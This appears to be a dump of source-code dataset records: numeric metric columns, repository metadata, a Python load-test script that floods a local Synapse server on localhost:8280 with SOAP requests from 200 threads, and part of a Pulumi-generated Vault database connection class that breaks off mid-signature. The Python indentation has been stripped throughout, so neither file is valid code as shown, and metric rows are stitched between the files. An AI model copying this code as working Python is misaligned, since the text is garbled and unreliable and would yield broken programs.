| 0
| 0
| 0
| 0
| 0
| 0.082645
| 121
| 5
| 41
| 24.2
| 0.342342
| 0
| 0
| 0.666667
| 0
| 0
| 0.735537
| 0.479339
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b04288a335516738d4670f19a6ab58f74a403ec4
| 3,051
|
py
|
Python
|
PythonScripts/HitHard.py
|
vanjikumaran/SynapseLoadTest
|
914368a6b8120b63f8ea1b995458dd355775ff72
|
[
"Apache-2.0"
] | null | null | null |
PythonScripts/HitHard.py
|
vanjikumaran/SynapseLoadTest
|
914368a6b8120b63f8ea1b995458dd355775ff72
|
[
"Apache-2.0"
] | null | null | null |
PythonScripts/HitHard.py
|
vanjikumaran/SynapseLoadTest
|
914368a6b8120b63f8ea1b995458dd355775ff72
|
[
"Apache-2.0"
] | null | null | null |
import hashlib
import os
import sys
import xml.dom.minidom as mini
import http.client
import threading
import datetime
numberOfconcurrency=200
sampleSoapMessage = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><tests><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test><test>vfs_{0}</test></tests></soapenv:Body></soapenv:Envelope>"""
class ThreadClass(threading.Thread):
def run(self):
for i in range(1001, 1501):
print(i)
headers = {"Content-Type": "application/xml","SOAPAction": "urn:getFullQuote"}
conn = http.client.HTTPConnection("localhost", 8280, timeout=3000)
conn.request("POST", "/services/vfs_{0}".format(i), sampleSoapMessage.format(i), headers)
response = conn.getresponse()
print(response)
print(" ---- Thread ----- " + self.getName())
for i in range(numberOfconcurrency):
t = ThreadClass()
t.start()
| 95.34375
| 2,382
| 0.667322
| 543
| 3,051
| 3.54512
| 0.117864
| 0.230649
| 0.457143
| 0.685714
| 0.685714
| 0.685714
| 0.685714
| 0.685714
| 0.685714
| 0.685714
| 0
| 0.044158
| 0.03507
| 3,051
| 31
| 2,383
| 98.419355
| 0.609715
| 0
| 0
| 0
| 0
| 0.045455
| 0.805902
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.318182
| 0
| 0.409091
| 0.136364
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b062bcf428aa338ef6f8ce77d681d2b0ade4abc8
| 52,719
|
py
|
Python
|
sdk/python/pulumi_vault/database/secret_backend_connection.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-10-07T17:44:18.000Z
|
2022-03-30T20:46:33.000Z
|
sdk/python/pulumi_vault/database/secret_backend_connection.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-10-11T18:13:07.000Z
|
2022-03-31T21:09:41.000Z
|
sdk/python/pulumi_vault/database/secret_backend_connection.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-10-28T10:08:40.000Z
|
2020-03-17T14:20:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SecretBackendConnectionArgs', 'SecretBackendConnection']
@pulumi.input_type
class SecretBackendConnectionArgs:
def __init__(__self__, *,
backend: pulumi.Input[str],
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cassandra: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']] = None,
hana: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']] = None,
mongodb: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']] = None,
mongodbatlas: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']] = None,
mssql: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']] = None,
mysql: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']] = None,
mysql_aurora: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']] = None,
mysql_legacy: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']] = None,
mysql_rds: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']] = None,
postgresql: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']] = None,
verify_connection: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a SecretBackendConnection resource.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input['SecretBackendConnectionCassandraArgs'] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input['SecretBackendConnectionElasticsearchArgs'] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input['SecretBackendConnectionHanaArgs'] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbArgs'] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbatlasArgs'] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input['SecretBackendConnectionMssqlArgs'] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlArgs'] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlAuroraArgs'] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlLegacyArgs'] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlRdsArgs'] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input['SecretBackendConnectionOracleArgs'] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input['SecretBackendConnectionPostgresqlArgs'] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input['SecretBackendConnectionSnowflakeArgs'] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
pulumi.set(__self__, "backend", backend)
if allowed_roles is not None:
pulumi.set(__self__, "allowed_roles", allowed_roles)
if cassandra is not None:
pulumi.set(__self__, "cassandra", cassandra)
if data is not None:
pulumi.set(__self__, "data", data)
if elasticsearch is not None:
pulumi.set(__self__, "elasticsearch", elasticsearch)
if hana is not None:
pulumi.set(__self__, "hana", hana)
if mongodb is not None:
pulumi.set(__self__, "mongodb", mongodb)
if mongodbatlas is not None:
pulumi.set(__self__, "mongodbatlas", mongodbatlas)
if mssql is not None:
pulumi.set(__self__, "mssql", mssql)
if mysql is not None:
pulumi.set(__self__, "mysql", mysql)
if mysql_aurora is not None:
pulumi.set(__self__, "mysql_aurora", mysql_aurora)
if mysql_legacy is not None:
pulumi.set(__self__, "mysql_legacy", mysql_legacy)
if mysql_rds is not None:
pulumi.set(__self__, "mysql_rds", mysql_rds)
if name is not None:
pulumi.set(__self__, "name", name)
if oracle is not None:
pulumi.set(__self__, "oracle", oracle)
if postgresql is not None:
pulumi.set(__self__, "postgresql", postgresql)
if root_rotation_statements is not None:
pulumi.set(__self__, "root_rotation_statements", root_rotation_statements)
if snowflake is not None:
pulumi.set(__self__, "snowflake", snowflake)
if verify_connection is not None:
pulumi.set(__self__, "verify_connection", verify_connection)
@property
@pulumi.getter
def backend(self) -> pulumi.Input[str]:
"""
The unique name of the Vault mount to configure.
"""
return pulumi.get(self, "backend")
@backend.setter
def backend(self, value: pulumi.Input[str]):
pulumi.set(self, "backend", value)
@property
@pulumi.getter(name="allowedRoles")
def allowed_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of roles that are allowed to use this
connection.
"""
return pulumi.get(self, "allowed_roles")
@allowed_roles.setter
def allowed_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_roles", value)
@property
@pulumi.getter
def cassandra(self) -> Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]:
"""
A nested block containing configuration options for Cassandra connections.
"""
return pulumi.get(self, "cassandra")
@cassandra.setter
def cassandra(self, value: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]):
pulumi.set(self, "cassandra", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
"""
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "data", value)
@property
@pulumi.getter
def elasticsearch(self) -> Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]:
"""
A nested block containing configuration options for Elasticsearch connections.
"""
return pulumi.get(self, "elasticsearch")
@elasticsearch.setter
def elasticsearch(self, value: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]):
pulumi.set(self, "elasticsearch", value)
@property
@pulumi.getter
def hana(self) -> Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]:
"""
A nested block containing configuration options for SAP HanaDB connections.
"""
return pulumi.get(self, "hana")
@hana.setter
def hana(self, value: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]):
pulumi.set(self, "hana", value)
@property
@pulumi.getter
def mongodb(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]:
"""
A nested block containing configuration options for MongoDB connections.
"""
return pulumi.get(self, "mongodb")
@mongodb.setter
def mongodb(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]):
pulumi.set(self, "mongodb", value)
@property
@pulumi.getter
def mongodbatlas(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]:
"""
A nested block containing configuration options for MongoDB Atlas connections.
"""
return pulumi.get(self, "mongodbatlas")
@mongodbatlas.setter
def mongodbatlas(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]):
pulumi.set(self, "mongodbatlas", value)
@property
@pulumi.getter
def mssql(self) -> Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]:
"""
A nested block containing configuration options for MSSQL connections.
"""
return pulumi.get(self, "mssql")
@mssql.setter
def mssql(self, value: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]):
pulumi.set(self, "mssql", value)
@property
@pulumi.getter
def mysql(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]:
"""
A nested block containing configuration options for MySQL connections.
"""
return pulumi.get(self, "mysql")
@mysql.setter
def mysql(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]):
pulumi.set(self, "mysql", value)
@property
@pulumi.getter(name="mysqlAurora")
def mysql_aurora(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]:
"""
A nested block containing configuration options for Aurora MySQL connections.
"""
return pulumi.get(self, "mysql_aurora")
@mysql_aurora.setter
def mysql_aurora(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]):
pulumi.set(self, "mysql_aurora", value)
@property
@pulumi.getter(name="mysqlLegacy")
def mysql_legacy(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]:
"""
A nested block containing configuration options for legacy MySQL connections.
"""
return pulumi.get(self, "mysql_legacy")
@mysql_legacy.setter
def mysql_legacy(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]):
pulumi.set(self, "mysql_legacy", value)
@property
@pulumi.getter(name="mysqlRds")
def mysql_rds(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]:
"""
A nested block containing configuration options for RDS MySQL connections.
"""
return pulumi.get(self, "mysql_rds")
@mysql_rds.setter
def mysql_rds(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]):
pulumi.set(self, "mysql_rds", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name to give the database connection.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def oracle(self) -> Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]:
"""
A nested block containing configuration options for Oracle connections.
"""
return pulumi.get(self, "oracle")
@oracle.setter
def oracle(self, value: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]):
pulumi.set(self, "oracle", value)
@property
@pulumi.getter
def postgresql(self) -> Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]:
"""
A nested block containing configuration options for PostgreSQL connections.
"""
return pulumi.get(self, "postgresql")
@postgresql.setter
def postgresql(self, value: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]):
pulumi.set(self, "postgresql", value)
@property
@pulumi.getter(name="rootRotationStatements")
def root_rotation_statements(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database statements to be executed to rotate the root user's credentials.
"""
return pulumi.get(self, "root_rotation_statements")
@root_rotation_statements.setter
def root_rotation_statements(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "root_rotation_statements", value)
@property
@pulumi.getter
def snowflake(self) -> Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]:
"""
A nested block containing configuration options for Snowflake connections.
"""
return pulumi.get(self, "snowflake")
@snowflake.setter
def snowflake(self, value: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]):
pulumi.set(self, "snowflake", value)
@property
@pulumi.getter(name="verifyConnection")
def verify_connection(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the connection should be verified on
initial configuration or not.
"""
return pulumi.get(self, "verify_connection")
@verify_connection.setter
def verify_connection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "verify_connection", value)
@pulumi.input_type
class _SecretBackendConnectionState:
def __init__(__self__, *,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']] = None,
hana: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']] = None,
mongodb: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']] = None,
mongodbatlas: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']] = None,
mssql: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']] = None,
mysql: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']] = None,
mysql_aurora: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']] = None,
mysql_legacy: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']] = None,
mysql_rds: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
oracle: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']] = None,
postgresql: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']] = None,
root_rotation_statements: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
snowflake: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']] = None,
verify_connection: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering SecretBackendConnection resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_roles: A list of roles that are allowed to use this
connection.
:param pulumi.Input[str] backend: The unique name of the Vault mount to configure.
:param pulumi.Input['SecretBackendConnectionCassandraArgs'] cassandra: A nested block containing configuration options for Cassandra connections.
:param pulumi.Input[Mapping[str, Any]] data: A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
:param pulumi.Input['SecretBackendConnectionElasticsearchArgs'] elasticsearch: A nested block containing configuration options for Elasticsearch connections.
:param pulumi.Input['SecretBackendConnectionHanaArgs'] hana: A nested block containing configuration options for SAP HanaDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbArgs'] mongodb: A nested block containing configuration options for MongoDB connections.
:param pulumi.Input['SecretBackendConnectionMongodbatlasArgs'] mongodbatlas: A nested block containing configuration options for MongoDB Atlas connections.
:param pulumi.Input['SecretBackendConnectionMssqlArgs'] mssql: A nested block containing configuration options for MSSQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlArgs'] mysql: A nested block containing configuration options for MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlAuroraArgs'] mysql_aurora: A nested block containing configuration options for Aurora MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlLegacyArgs'] mysql_legacy: A nested block containing configuration options for legacy MySQL connections.
:param pulumi.Input['SecretBackendConnectionMysqlRdsArgs'] mysql_rds: A nested block containing configuration options for RDS MySQL connections.
:param pulumi.Input[str] name: A unique name to give the database connection.
:param pulumi.Input['SecretBackendConnectionOracleArgs'] oracle: A nested block containing configuration options for Oracle connections.
:param pulumi.Input['SecretBackendConnectionPostgresqlArgs'] postgresql: A nested block containing configuration options for PostgreSQL connections.
:param pulumi.Input[Sequence[pulumi.Input[str]]] root_rotation_statements: A list of database statements to be executed to rotate the root user's credentials.
:param pulumi.Input['SecretBackendConnectionSnowflakeArgs'] snowflake: A nested block containing configuration options for Snowflake connections.
:param pulumi.Input[bool] verify_connection: Whether the connection should be verified on
initial configuration or not.
"""
if allowed_roles is not None:
pulumi.set(__self__, "allowed_roles", allowed_roles)
if backend is not None:
pulumi.set(__self__, "backend", backend)
if cassandra is not None:
pulumi.set(__self__, "cassandra", cassandra)
if data is not None:
pulumi.set(__self__, "data", data)
if elasticsearch is not None:
pulumi.set(__self__, "elasticsearch", elasticsearch)
if hana is not None:
pulumi.set(__self__, "hana", hana)
if mongodb is not None:
pulumi.set(__self__, "mongodb", mongodb)
if mongodbatlas is not None:
pulumi.set(__self__, "mongodbatlas", mongodbatlas)
if mssql is not None:
pulumi.set(__self__, "mssql", mssql)
if mysql is not None:
pulumi.set(__self__, "mysql", mysql)
if mysql_aurora is not None:
pulumi.set(__self__, "mysql_aurora", mysql_aurora)
if mysql_legacy is not None:
pulumi.set(__self__, "mysql_legacy", mysql_legacy)
if mysql_rds is not None:
pulumi.set(__self__, "mysql_rds", mysql_rds)
if name is not None:
pulumi.set(__self__, "name", name)
if oracle is not None:
pulumi.set(__self__, "oracle", oracle)
if postgresql is not None:
pulumi.set(__self__, "postgresql", postgresql)
if root_rotation_statements is not None:
pulumi.set(__self__, "root_rotation_statements", root_rotation_statements)
if snowflake is not None:
pulumi.set(__self__, "snowflake", snowflake)
if verify_connection is not None:
pulumi.set(__self__, "verify_connection", verify_connection)
@property
@pulumi.getter(name="allowedRoles")
def allowed_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of roles that are allowed to use this
connection.
"""
return pulumi.get(self, "allowed_roles")
@allowed_roles.setter
def allowed_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_roles", value)
@property
@pulumi.getter
def backend(self) -> Optional[pulumi.Input[str]]:
"""
The unique name of the Vault mount to configure.
"""
return pulumi.get(self, "backend")
@backend.setter
def backend(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend", value)
@property
@pulumi.getter
def cassandra(self) -> Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]:
"""
A nested block containing configuration options for Cassandra connections.
"""
return pulumi.get(self, "cassandra")
@cassandra.setter
def cassandra(self, value: Optional[pulumi.Input['SecretBackendConnectionCassandraArgs']]):
pulumi.set(self, "cassandra", value)
@property
@pulumi.getter
def data(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A map of sensitive data to pass to the endpoint. Useful for templated connection strings.
"""
return pulumi.get(self, "data")
@data.setter
def data(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "data", value)
@property
@pulumi.getter
def elasticsearch(self) -> Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]:
"""
A nested block containing configuration options for Elasticsearch connections.
"""
return pulumi.get(self, "elasticsearch")
@elasticsearch.setter
def elasticsearch(self, value: Optional[pulumi.Input['SecretBackendConnectionElasticsearchArgs']]):
pulumi.set(self, "elasticsearch", value)
@property
@pulumi.getter
def hana(self) -> Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]:
"""
A nested block containing configuration options for SAP HanaDB connections.
"""
return pulumi.get(self, "hana")
@hana.setter
def hana(self, value: Optional[pulumi.Input['SecretBackendConnectionHanaArgs']]):
pulumi.set(self, "hana", value)
@property
@pulumi.getter
def mongodb(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]:
"""
A nested block containing configuration options for MongoDB connections.
"""
return pulumi.get(self, "mongodb")
@mongodb.setter
def mongodb(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbArgs']]):
pulumi.set(self, "mongodb", value)
@property
@pulumi.getter
def mongodbatlas(self) -> Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]:
"""
A nested block containing configuration options for MongoDB Atlas connections.
"""
return pulumi.get(self, "mongodbatlas")
@mongodbatlas.setter
def mongodbatlas(self, value: Optional[pulumi.Input['SecretBackendConnectionMongodbatlasArgs']]):
pulumi.set(self, "mongodbatlas", value)
@property
@pulumi.getter
def mssql(self) -> Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]:
"""
A nested block containing configuration options for MSSQL connections.
"""
return pulumi.get(self, "mssql")
@mssql.setter
def mssql(self, value: Optional[pulumi.Input['SecretBackendConnectionMssqlArgs']]):
pulumi.set(self, "mssql", value)
@property
@pulumi.getter
def mysql(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]:
"""
A nested block containing configuration options for MySQL connections.
"""
return pulumi.get(self, "mysql")
@mysql.setter
def mysql(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlArgs']]):
pulumi.set(self, "mysql", value)
@property
@pulumi.getter(name="mysqlAurora")
def mysql_aurora(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]:
"""
A nested block containing configuration options for Aurora MySQL connections.
"""
return pulumi.get(self, "mysql_aurora")
@mysql_aurora.setter
def mysql_aurora(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlAuroraArgs']]):
pulumi.set(self, "mysql_aurora", value)
@property
@pulumi.getter(name="mysqlLegacy")
def mysql_legacy(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]:
"""
A nested block containing configuration options for legacy MySQL connections.
"""
return pulumi.get(self, "mysql_legacy")
@mysql_legacy.setter
def mysql_legacy(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlLegacyArgs']]):
pulumi.set(self, "mysql_legacy", value)
@property
@pulumi.getter(name="mysqlRds")
def mysql_rds(self) -> Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]:
"""
A nested block containing configuration options for RDS MySQL connections.
"""
return pulumi.get(self, "mysql_rds")
@mysql_rds.setter
def mysql_rds(self, value: Optional[pulumi.Input['SecretBackendConnectionMysqlRdsArgs']]):
pulumi.set(self, "mysql_rds", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name to give the database connection.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def oracle(self) -> Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]:
"""
A nested block containing configuration options for Oracle connections.
"""
return pulumi.get(self, "oracle")
@oracle.setter
def oracle(self, value: Optional[pulumi.Input['SecretBackendConnectionOracleArgs']]):
pulumi.set(self, "oracle", value)
@property
@pulumi.getter
def postgresql(self) -> Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]:
"""
A nested block containing configuration options for PostgreSQL connections.
"""
return pulumi.get(self, "postgresql")
@postgresql.setter
def postgresql(self, value: Optional[pulumi.Input['SecretBackendConnectionPostgresqlArgs']]):
pulumi.set(self, "postgresql", value)
@property
@pulumi.getter(name="rootRotationStatements")
def root_rotation_statements(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database statements to be executed to rotate the root user's credentials.
"""
return pulumi.get(self, "root_rotation_statements")
@root_rotation_statements.setter
def root_rotation_statements(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "root_rotation_statements", value)
@property
@pulumi.getter
def snowflake(self) -> Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]:
"""
A nested block containing configuration options for Snowflake connections.
"""
return pulumi.get(self, "snowflake")
@snowflake.setter
def snowflake(self, value: Optional[pulumi.Input['SecretBackendConnectionSnowflakeArgs']]):
pulumi.set(self, "snowflake", value)
@property
@pulumi.getter(name="verifyConnection")
def verify_connection(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the connection should be verified on
initial configuration or not.
"""
return pulumi.get(self, "verify_connection")
@verify_connection.setter
def verify_connection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "verify_connection", value)
class SecretBackendConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_roles: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backend: Optional[pulumi.Input[str]] = None,
cassandra: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionCassandraArgs']]] = None,
data: Optional[pulumi.Input[Mapping[str, Any]]] = None,
elasticsearch: Optional[pulumi.Input[pulumi.InputType['SecretBackendConnectionElasticsearchArgs']]] = None,
